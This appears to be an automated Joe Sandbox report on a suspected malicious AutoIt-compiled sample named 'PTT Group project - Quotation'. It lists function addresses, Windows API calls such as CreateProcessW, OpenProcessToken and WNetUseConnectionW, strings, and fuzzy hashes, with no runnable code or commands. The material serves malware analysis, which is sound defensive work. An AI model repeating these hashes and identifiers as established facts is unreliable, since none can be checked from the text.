Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 1aafc42ddf36e36481030081ee497ddd245311c12668ce853d9ccf5701f6022b
Instruction ID: 34ec9ede37f031fd22c7190e832118524a5e7a4105a0fe04fdcf15a328a8e515
Opcode Fuzzy Hash: 1aafc42ddf36e36481030081ee497ddd245311c12668ce853d9ccf5701f6022b
Instruction Fuzzy Hash: 3B115E35A04508AFCB04FBA4DD96EEEB7B9AF84310B154066F502A7261DF30AE44DBA1

Function 00969023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00969043
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00969055
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0096906B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00969086

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 962c21e6801ef5d7a464c17e56b20aa03a370332b44c4fd55392c14764ca64dc
Instruction ID: d677175a4bebd6c2ad4d9069869eba37a2effa94a93f19d479cbcae17361a056
Opcode Fuzzy Hash: 962c21e6801ef5d7a464c17e56b20aa03a370332b44c4fd55392c14764ca64dc
Instruction Fuzzy Hash: D2114C79901218FFEB10DFA9C984E9DBB78FB48310F204095E904B7250D6716E10DB90

Function 00911290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00912612: GetWindowLongW.USER32(?,000000EB), ref: 00912623

DefDlgProcW.USER32(?,00000020,?), ref: 009112D8
GetClientRect.USER32(?,?), ref: 0094B84B
GetCursorPos.USER32(?), ref: 0094B855
ScreenToClient.USER32(?,?), ref: 0094B860

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: a04911a0b9992ced629b9197ac7af08b316f21ec6e0851c77f3a78d28930ef27
Instruction ID: c2c2c63386a2250367fadaaa4f76e0821388223732d286ef15b6b9e4f068e14c
Opcode Fuzzy Hash: a04911a0b9992ced629b9197ac7af08b316f21ec6e0851c77f3a78d28930ef27
Instruction Fuzzy Hash: A4113A35A1111DBFCF10EF98D885AFEB7B8EB46301F100856FA21E7250C734BA919BA5

Function 00971652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,009701FD,?,00971250,?,00008000), ref: 0097166F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,009701FD,?,00971250,?,00008000), ref: 00971694
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,009701FD,?,00971250,?,00008000), ref: 0097169E
Sleep.KERNEL32(?,?,?,?,?,?,?,009701FD,?,00971250,?,00008000), ref: 009716D1

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 442bdf46361961ff3a81e1e3e590ae2f924ee3006abf26ad61e90db4d2e67bc0
Instruction ID: d55b23671f29d2f432e4ee7fd31d46b108a7f0e5dbfa36a81790c06b88c39a5e
Opcode Fuzzy Hash: 442bdf46361961ff3a81e1e3e590ae2f924ee3006abf26ad61e90db4d2e67bc0
Instruction Fuzzy Hash: A9118E32C1851DDBCF109FA9D858AEEBB78FF09701F09805AE988B2240CB3055609BD6

Function 00947207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0094722B

Part of subcall function 00947912: __fltout2.LIBCMT ref: 0094793B

__cftog_l.LIBCMT ref: 00947251
__cftoe_l.LIBCMT ref: 00947283

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 106dbd2c6a0bb029bd3d3574779c55cb25fe8e00030b617d97237f3365d9809e
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 8001493604818EBBCF165ED4CC01CEE7F66BF69351B598A15FA2868031D377C9B1AB81

Function 0099B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0099B59E
ScreenToClient.USER32(?,?), ref: 0099B5B6
ScreenToClient.USER32(?,?), ref: 0099B5DA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0099B5F5

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: e40b6514f02ede770976df40381311f693d4e192b94f500554047d5316416f8a
Instruction ID: 326118b62c5b165f9b969ea5e5477ec6424b8262f74729c46e1dd00d67597876
Opcode Fuzzy Hash: e40b6514f02ede770976df40381311f693d4e192b94f500554047d5316416f8a
Instruction Fuzzy Hash: 981146B5D0420DEFDB41CF99D544AEEFBB9FB08310F104166E914E3220D735AA559F51

Function 0099B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0099B8FE
_memset.LIBCMT ref: 0099B90D
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,009D7F20,009D7F64), ref: 0099B93C
CloseHandle.KERNEL32 ref: 0099B94E

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 166d8a9b3973d8550219c88fed18d81a8f3a4f5561a39b70a518475c62c34739
Instruction ID: 3c839401275768a4280a1a95bad30304ab9fb4d9616de198c333242bab0380b5
Opcode Fuzzy Hash: 166d8a9b3973d8550219c88fed18d81a8f3a4f5561a39b70a518475c62c34739
Instruction Fuzzy Hash: 61F054B15993007BE22027B9AC06F7BBB9CDB08394F404022FA08D5291E775494097A8

Function 00976E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00976E88

Part of subcall function 0097794E: _memset.LIBCMT ref: 00977983

_memmove.LIBCMT ref: 00976EAB
_memset.LIBCMT ref: 00976EB8
LeaveCriticalSection.KERNEL32(?), ref: 00976EC8

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 571f43958f237c23f53f84eb16956b390aadb84678fe51b3354abb17c3a74caa
Instruction ID: 6ff2f2aa62a9a6e41f59e76856de6c4e15705c12ac76e5781af7408e202a5875
Opcode Fuzzy Hash: 571f43958f237c23f53f84eb16956b390aadb84678fe51b3354abb17c3a74caa
Instruction Fuzzy Hash: CCF0543A104200ABCF016F55DC85B4AFB29EF85320F04C062FE089E226C731A911DBB4

Function 0099C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 009112F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0091134D
Part of subcall function 009112F3: SelectObject.GDI32(?,00000000), ref: 0091135C
Part of subcall function 009112F3: BeginPath.GDI32(?), ref: 00911373
Part of subcall function 009112F3: SelectObject.GDI32(?,00000000), ref: 0091139C

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0099C030
LineTo.GDI32(00000000,?,?), ref: 0099C03D
EndPath.GDI32(00000000), ref: 0099C04D
StrokePath.GDI32(00000000), ref: 0099C05B

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 53233783a54b6ccd5d959e87695908ef33ac6462e6272e4ec2c9cccd2a4f8be8
Instruction ID: 296829d406c5a00f970a66d710207c05520253af9930877fdfe57eac8c55220e
Opcode Fuzzy Hash: 53233783a54b6ccd5d959e87695908ef33ac6462e6272e4ec2c9cccd2a4f8be8
Instruction Fuzzy Hash: 42F05E32059259BBDF226F99AC0AFCE3F59AF05311F144002FA11A10E2C77556A1EBD5

Function 0096A37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0096A399
GetWindowThreadProcessId.USER32(?,00000000), ref: 0096A3AC
GetCurrentThreadId.KERNEL32 ref: 0096A3B3
AttachThreadInput.USER32(00000000), ref: 0096A3BA

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 009e303da5d67d3bb339d72401b190cba51641ffa3a90e0cf7d09ad3bca4689a
Instruction ID: 7553adf8e7e24cb669a5d62cef733ef0951785a72ba85305e6d45e45810d9cbe
Opcode Fuzzy Hash: 009e303da5d67d3bb339d72401b190cba51641ffa3a90e0cf7d09ad3bca4689a
Instruction Fuzzy Hash: BBE0C972549328BADB205BA6DC0DEDBBF5CEF167A1F008026F609D5060C6758540EBA1

Function 00912218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00912231
SetTextColor.GDI32(?,000000FF), ref: 0091223B
SetBkMode.GDI32(?,00000001), ref: 00912250
GetStockObject.GDI32(00000005), ref: 00912258
GetWindowDC.USER32(?,00000000), ref: 0094C0D3
GetPixel.GDI32(00000000,00000000,00000000), ref: 0094C0E0
GetPixel.GDI32(00000000,?,00000000), ref: 0094C0F9
GetPixel.GDI32(00000000,00000000,?), ref: 0094C112
GetPixel.GDI32(00000000,?,?), ref: 0094C132
ReleaseDC.USER32(?,00000000), ref: 0094C13D

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 4d1d91c686ebe36a704bd128cead00633371fc5024e5ae18f834b3c0d702a3d7
Instruction ID: 1542f71d58d66933906cf3d5681a65069275e1a5f34cca41f89ddc90357a95e4
Opcode Fuzzy Hash: 4d1d91c686ebe36a704bd128cead00633371fc5024e5ae18f834b3c0d702a3d7
Instruction Fuzzy Hash: F7E06D32218244EEDF215F68FC0DBE8BB14EB05336F108367FA79880E187714990EB62

Function 00968C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00968C63
OpenThreadToken.ADVAPI32(00000000,?,?,?,0096882E), ref: 00968C6A
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0096882E), ref: 00968C77
OpenProcessToken.ADVAPI32(00000000,?,?,?,0096882E), ref: 00968C7E

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 9273a2bb3dce95d13863fda6274c69fc8d56b633c704c2f3c84b01cde6f23347
Instruction ID: f253fe65eb7345f008e2b93272f3b44025b9faab35d58a7ab196c8d4cf627b9c
Opcode Fuzzy Hash: 9273a2bb3dce95d13863fda6274c69fc8d56b633c704c2f3c84b01cde6f23347
Instruction Fuzzy Hash: E6E02672616210DBD7201FB46D0DB477BACEF50792F044829B285E9080DA388446DB30

Function 00952187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00952187
GetDC.USER32(00000000), ref: 00952191
GetDeviceCaps.GDI32(00000000,0000000C), ref: 009521B1
ReleaseDC.USER32(?), ref: 009521D2

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 7f276312e04ce0b970c52d955bc710d60ba2294808a2ef3c47d319f281a92796
Instruction ID: a36cb90febff2b76ad9b4ccb9bc5ce9378546c59efae483012069c69e8eca225
Opcode Fuzzy Hash: 7f276312e04ce0b970c52d955bc710d60ba2294808a2ef3c47d319f281a92796
Instruction Fuzzy Hash: 1AE0E5B5954708EFDF019F64C818A9DBBF5EB4C351F208826F95AD7260CB788181AF40

Function 0095219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0095219B
GetDC.USER32(00000000), ref: 009521A5
GetDeviceCaps.GDI32(00000000,0000000C), ref: 009521B1
ReleaseDC.USER32(?), ref: 009521D2

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 3568a83ae8a31f2539529d64879014289bea82fd5b4649f66ec625e7f739d129
Instruction ID: 7fb290631588f7760d2dd425fbd0e214472581e97cb56778f37895118ccac83b
Opcode Fuzzy Hash: 3568a83ae8a31f2539529d64879014289bea82fd5b4649f66ec625e7f739d129
Instruction Fuzzy Hash: 6BE0E5B5914308AFCF019F64C81869DBBE5AB4C310F208426F95AD7260CB789141AF40

Function 0096B7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0096B981

Strings

Container, xrefs: 0096B8FE
AutoIt3GUI, xrefs: 0096B8F9

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 9836e3c9618cea65c3075980414746b962bc02d191ee63fb5cc8c13cc5274c47
Instruction ID: adc3bccca6963f750b0ab13ddef499988368993cdd29a37b9e3abd7593524aac
Opcode Fuzzy Hash: 9836e3c9618cea65c3075980414746b962bc02d191ee63fb5cc8c13cc5274c47
Instruction Fuzzy Hash: 37914C746006019FDB24DF68C994B6AB7F9FF48710F24856EF94ACB691EB70E881CB50

Function 0097B217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0092FEC6: _wcscpy.LIBCMT ref: 0092FEE9

Part of subcall function 00919997: __itow.LIBCMT ref: 009199C2
Part of subcall function 00919997: __swprintf.LIBCMT ref: 00919A0C

__wcsnicmp.LIBCMT ref: 0097B298
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0097B361

Strings

LPT, xrefs: 0097B292

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: e185a85911deede19714214cd59bb8d3aed3b0d91ef59919751e9d08a02c2dc6
Instruction ID: 03749f382e66d27340080c71489a64d35ed6ce03b93a943da02ddb19dafeec55
Opcode Fuzzy Hash: e185a85911deede19714214cd59bb8d3aed3b0d91ef59919751e9d08a02c2dc6
Instruction Fuzzy Hash: BE616476A00219AFCB14DF58C895FAEB7B8EF48310F11845AF55AAB351D774AE80CB50

Function 00922AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00922AC8
GlobalMemoryStatusEx.KERNEL32(?), ref: 00922AE1

Strings

@, xrefs: 00922AD5

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: b5739f7973364f7201961c6749b1f2acc567e91936ad9c92f95f4562b771f346
Instruction ID: 7aa2c7d067213d7d1fbb8d2206bdd6e426ed3eef4dacbc49802025e2bce3161d
Opcode Fuzzy Hash: b5739f7973364f7201961c6749b1f2acc567e91936ad9c92f95f4562b771f346
Instruction Fuzzy Hash: EE5146715287489BD320AF10D896BAFBBE8FFC8310F42885DF2D9411A5DB308569CB66

Function 009799BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 0091506B: __fread_nolock.LIBCMT ref: 00915089

_wcscmp.LIBCMT ref: 00979AAE
_wcscmp.LIBCMT ref: 00979AC1

Strings

FILE, xrefs: 009799FA

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 804b508d6f9f45764524b7ac16d46117ff29c15c81a030be023b2d59839dec83
Instruction ID: 2f17a6b3bf57e3422e26f17f71a8b9371dfadc82fb66662a308458671a4860a1
Opcode Fuzzy Hash: 804b508d6f9f45764524b7ac16d46117ff29c15c81a030be023b2d59839dec83
Instruction Fuzzy Hash: 50410972B00609BADF209BE4DC46FEFB7BDDF89714F014069F904A7181D675AE4487A1

Function 00982882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00982892
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 009828C8

Strings

|, xrefs: 00982899

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

